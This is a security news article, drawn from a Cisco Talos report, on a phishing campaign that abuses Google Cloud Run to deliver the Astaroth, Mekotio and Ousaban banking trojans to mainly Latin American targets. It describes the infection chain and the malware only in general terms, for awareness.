Google Cloud Run Exploited in Major Banking Trojan Offensive

Google Cloud Run, a service designed to streamline the deployment of both front and backend applications, is being abused by hackers to distribute banking trojans like Astaroth, Mekotio, and Ousaban, according to security experts. 

Cisco Talos has reported a huge surge in the exploitation of Google Cloud Run for distributing harmful malware since September 2023. The service’s cost-efficiency and capability to bypass conventional security filters and blocks have made it an attractive target for attackers.

Volume of Google Cloud Run-related phishing emails (source: Cisco)

Anatomy of the Cyber Attacks

The attack begins with meticulously crafted phishing emails, masquerading as legitimate communications like invoices or official notifications from financial or governmental institutions. Predominantly crafted in Spanish to target the Latin American demographic, there have been instances of Italian-language emails, expanding the campaign’s reach.

Sample of phishing email (source: Cisco)

Victims are lured into clicking links within these emails, redirecting them to malevolent web services hosted on Google Cloud Run. In several instances, these links further redirect victims to download malicious ZIP archives containing MSI installer files from Google Cloud Storage, serving as the primary vehicle for malware delivery.

Upon execution, these MSI files trigger the download and activation of additional malicious components, exploiting legitimate Windows tools like BITSAdmin for stealthy payload delivery. To ensure their longevity within infected systems, the malware creates or modifies startup items that guarantee their reactivation post-reboot, thus solidifying their presence.

The Malicious Software in Focus

Here is a closer look at the trio of malware: 

• Astaroth/Guildma: Initially focusing on Brazil, this malware has broadened its horizon, targeting over 300 financial entities across 15 Latin American countries. It is notorious for its advanced evasion techniques, credential theft, and cryptocurrency exchange infiltration.

• Mekotio: This malware remains active predominantly in Latin America, specializing in banking credential theft, personal data exfiltration, and redirecting victims to phishing sites through browser manipulation.

• Ousaban: Known for its keylogging and phishing capabilities, Ousaban often serves as a secondary payload in these attacks, hinting at possible collaboration or a singular entity orchestrating the distribution of multiple malware types.

Final Word

The exploitation of Google Cloud Run for the distribution of banking trojans represents a significant evolution in cybercriminal tactics, highlighting the need for continuous vigilance and advanced security measures to protect against these sophisticated threats.